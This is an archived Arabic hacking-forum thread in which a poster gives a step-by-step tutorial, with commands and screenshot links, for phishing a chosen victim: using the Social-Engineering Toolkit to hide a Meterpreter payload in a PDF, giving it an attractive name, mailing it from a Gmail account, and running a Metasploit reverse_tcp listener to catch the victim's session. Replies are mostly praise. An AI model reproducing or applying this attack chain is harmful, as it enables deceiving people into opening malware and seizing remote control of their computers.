المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : [دورة الباك تراك 4 ] الاختراق بالهندسة الاجتماعية شي لا يصدقه عقل



Ace
05-06-2011, 02:45 AM
بسم الله الرحمن الرحيم ..



اليوم بنتكلم عن الاختراق بالهندسة الاجتماعية ( Social Engineering ) و هي ما يعرف باقناع الضحية بما حوله من البيئة المحيطة به على الانترنت او ايا كان .. و لا يخفى على الجميع ان اشهر مهندس اجتماعي هو كيفين ميتنيك

بحاول اني ما اخرج عن الموضوع .. ( باختصار هي التلاعب بالناس لفعل ما تريد لكي تحصل على ما تريد )

بصراحة و بالنسبة لي .. تعتبر الهندسة الاجتماعية سلآح فتاك و خطير لانها لا تتوقف على اقفال ثغرة معينة او حماية للنظام و ما الى ذلك .. لانه بعد اقناع الضحية لا شيء يقف امام الوصول لما تريد .

================================================== ========

نرجع لموضوعنا ..

كيف تتم العملية ؟

1-عن طريق اداة من صناعة المبرمج ديفيد كنيدي ( مبرمج الفاست تراك )
2-حقن بايلود مشفر من جميع الحمايات بكتاب الكتروني بصيغة pdf
3-ارسال الملف لبريد الضحية على الانبوكس
4-التنصت و الانتظار حتى يتم الاتصال بالضحية

ماهي الادوات اللازمة للقيام بالعملية ؟


1-Social-Engineering Toolkit
2-Gmail account
3-M3tasploit

طبعا كل الادوات متوفرة على الباك تراك الا Social-Engineering Toolkit سوف نقوم بتحميلها و صنع مجلد لها

نبدا مع اول امر وهو لتحميل الاداة و صنع مجلد لها

كود:
svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
ملاحظة : يجب ان تكون root ..


الان ندخل على مجلد الاداة بالامر :

كود:
cd SET
من ثم نشغل الادة عن طريق الامر :

كود:
./set
و هذي صورة توضيحية للامرين ..
http://www14.0zz0.com/2011/05/05/22/443505496.png

اشرح لكم الخيارات ..

الخيار رقم 1 لعمل هندسة اجتماعية عبر الايميل ..

الخيار رقم 2 لعمل هندسة اجتماعية عبر صفحات الويب

و الخيارات الباقية للتحديث و صنع بايلودات ..

عموما هجومنا هو رقم 1 اللي يتم عن طريق الايميل ..

نختار الخيار الاول بالرقم 1 و نشوف :
http://www10.0zz0.com/2011/05/05/22/528248595.png


مثل ماهو واضح بالصورة .. طلع لنا خيارين ثانية نختار الخيار الاول بالرقم 1 ثم راح يسالك اذا تبي تكون بايلود او لا نختار نعم
http://www10.0zz0.com/2011/05/05/22/660915225.png



الان ظهر لنا عدة خيارات لطريقة زرع البايلود اللي تبي تكونه داخل الكتاب الالتروني ..

نختار رقم 4 لانه هو الفعال دائما .. اما الباقي فهو عن طريق ثغرات اي ان هناك احتمال بعدم نجاح العملية ..

و بعد ما اخترنا الاستغلال المناسب .. الان نحدد البايلود المناسب و يفضل Meterpreter

http://www10.0zz0.com/2011/05/05/22/451175627.png


الان اكتملت الاعدادات و تم صناعة الملف و البايلود بنجاح ..

نضغط انتر لاستكمال العملية و ارسال الملف

بيظهر لك خيارين .. الاول اذا كنت تبي تترك اسم الملف زي ماهو تختاره ..

الثاني يقلك لا .. لازم اظهر بمظهر اكثر جاذبية للضحية

طبعا اكيد نختار الخيار الثاني و نسمي الملف باسم جذاب ..
http://www10.0zz0.com/2011/05/05/22/522496122.png


الان ايضا .. ظهر لنا خيارين جديدة الخيار الاول يعني ارسال الملف لايميل واحد فقط
اما الخيار الثاني فهو لارسال الملف لعدة ايميلات !

نختار الخيار الاول .. بالرقم 1 < انت بامكانك تختار الخيار الثاني

بعد ما اخترنا الخيار الاول الان ظهرت لنا خيارات اخرى تفيد عنوان الرسالة و ما بداخلها

طبعا يوجد اكثر من خيار .. بالنسبة لي انا اعجبتني الرسالة رقم 4 و انت اذا ما عجبك شيء بامكانك تكتب رسالة اخرى من تاليفك بالرقم 6
بعد ما حددنا الرسالة المطلوبة الان يطلب منا تحديد الايميل المراد استهدافه ..

نحدده و نتبع الخيارات المتبقية ..
http://www10.0zz0.com/2011/05/05/22/110269808.png


بعد ما تم تحديد ايميل الضحية .. طلب منا عنوان المرسل فاخترت عن طريق حساب gmail و ادخلت الحساب و الباسورد .. و من ثم طلب مني اذا كنت ابي اتنصت و لا لا و اخترت لا لاني بعد شوي راح اتنصت يدويا افضل ..
http://www10.0zz0.com/2011/05/05/22/675734742.png

الان تم ارسال الرسالة وش رايكم نشوف كيف شكلها ؟

http://www10.0zz0.com/2011/05/05/22/559343439.png


.. واضحة الرسالة و الملف مرفق معها .. و بنفس عنوان الرسالة اللي اخترناه قبل شوي !

طيب الان نتنصت لانتظار الضحية بالامر :

كود:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=5555 E

الان نلاحظ الصورة بعد ما تنصتنا و بعد ما فتح الضحية الملف ظهور جلسة جديدة !

http://www10.0zz0.com/2011/05/05/23/217194014.png

تم بحمد الله ...

ملاحظة هامة :الشرح المصور ده منقول تم نقلو لكي يتم التدقيق في الاوامر وتم عمل شرح فديو مني لكي نطبق عملي ولكن عمليت الاختراق لن تكتمل لانه تم شرح العملية في الصور وكانت اداة SET قديمة فتم عمل شرح فديو على الجديدة.

تحميل الشرح الفديو :http://arabsh.com/paq2whht53g2.html

طير الباز
05-06-2011, 11:21 AM
مشكوووووووووووووووووووووو ر يامعلم

Ace
05-06-2011, 06:56 PM
بارك الله فيك ان شاء الله تستفيد .

V!RUS TROJAN
05-06-2011, 09:55 PM
هناك حالات يكون الصمت فيها أبلغ من الحديث , واقسم بالله أن هذا ما انتابني عند قراءتي للموضوع ,..~

فمهما كتبت من عبارات الثناء أو الوصف , لن تفي جهودك حقهآ..~

بآرك الله فيك وجعلها في ميزآن حسناتك ..~

تم التثبيت بقوه..~

Ace
05-06-2011, 10:08 PM
هناك حالات يكون الصمت فيها أبلغ من الحديث , واقسم بالله أن هذا ما انتابني عند قراءتي للموضوع ,..~

فمهما كتبت من عبارات الثناء أو الوصف , لن تفي جهودك حقهآ..~

بآرك الله فيك وجعلها في ميزآن حسناتك ..~

تم التثبيت بقوه..~

بارك الله فيك اخي

cracker
05-06-2011, 10:28 PM
مواضيعك روعة أهنيك

تستاهل التثبيت

تحياتي

BLACK.JaGuAr
05-06-2011, 10:37 PM
كل الاحترام والشكر والتقدير على مجهود المميز والكبير
بارك الله فيك ولا تحرمنا جديدك
تحياتي

Ace
05-06-2011, 10:46 PM
مواضيعك روعة أهنيك

تستاهل التثبيت

تحياتي

شرفني مرورك العطر يا كراكر

Ace
05-06-2011, 10:46 PM
كل الاحترام والشكر والتقدير على مجهود المميز والكبير
بارك الله فيك ولا تحرمنا جديدك
تحياتي

مرورك شرف لي ووسام اضعه على صدري يا قائدنا

QLQ
05-07-2011, 02:17 PM
يعطيك العافيه ع المووووووووووووووووضووووو وووووووع

Ace
05-09-2011, 06:05 PM
بارك الله فيك

Mad Devil
05-17-2011, 11:44 AM
واصل ابداعك المتميز

تحباتي

Ace
05-17-2011, 09:29 PM
واصل ابداعك المتميز

تحباتي

انشاء الله حبيبي بالتوفيق

sunlight
05-18-2011, 11:32 AM
شكرا لك وبارك الله فيك
مجهود رائع واصل ابداعك
وبالتوفيق لك ان شاءالله .

دنجوان الهكر
08-09-2011, 02:19 AM
روعة يا فنان

الإرهابي
08-11-2011, 04:56 PM
باركـ الله فيــك موضوع مميز دمــ بــود ــت

~تحيــــآتـــي~

halk green
08-15-2011, 12:45 PM
شكرا الك على المجهود الرائع

Omar Hack
08-29-2011, 08:53 AM
بارك الله فيك أخي الكريم
مجهود راااااائع
وتم التقييم

DaVaNci
09-18-2011, 11:05 PM
كل الاحتراام والتقدير لكتابة كلها احتراف وروعة
سلمت يمناك ودمت لناا خير معلم
تقبل مروري

amir100r
10-06-2011, 07:57 PM
merci beacoup t le 1